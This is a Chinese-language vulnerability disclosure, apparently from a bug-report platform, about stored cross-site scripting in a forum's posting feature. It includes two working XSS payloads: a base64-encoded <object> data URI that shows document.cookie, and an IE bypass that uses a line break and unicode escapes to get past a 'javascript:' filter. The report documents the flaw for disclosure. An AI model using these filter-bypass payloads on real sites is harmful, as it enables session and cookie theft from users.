### 简要描述:
过滤不严格导致XSS,最新版测试xss成功
### 详细说明:
POC:
在微吧发帖,内容写入
```
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+"></object>xss
```
PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+对应的是`<script>alert(document.cookie)</script>`的base64编码
firefox:
[<img src="https://images.seebug.org/upload/201404/160133423384983e3f23e0b948e8bf8f4af38367.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/160133423384983e3f23e0b948e8bf8f4af38367.jpg)
另附一枚ie下的绕过:
代码中有对javascript:进行了过滤,但是在IE下,可以通过回车来绕过,下图为过滤敏感字符片段:
[<img src="https://images.seebug.org/upload/201404/16014409fa4d22abd122a82db42d49589326570b.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/16014409fa4d22abd122a82db42d49589326570b.jpg)
可用如下语句进行绕过,这个语句不能直接写入贴子正文处,不然会被转义,需要用burp等工具来发包:
```
<a href='javascript
:alert(d\u006fcument.c\u006fokie)'>test</a>
```
结果:
[<img src="https://images.seebug.org/upload/201404/16030249ae85b31306d7ac6801ee75b9f60ac71c.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/16030249ae85b31306d7ac6801ee75b9f60ac71c.jpg)
### 漏洞证明:
当用户浏览贴子的时候,就会触发xss
firefox:
[<img src="https://images.seebug.org/upload/201404/160133423384983e3f23e0b948e8bf8f4af38367.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/160133423384983e3f23e0b948e8bf8f4af38367.jpg)
ie:
[<img src="https://images.seebug.org/upload/201404/16030249ae85b31306d7ac6801ee75b9f60ac71c.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/16030249ae85b31306d7ac6801ee75b9f60ac71c.jpg)
京公网安备 11010502034610号
暂无评论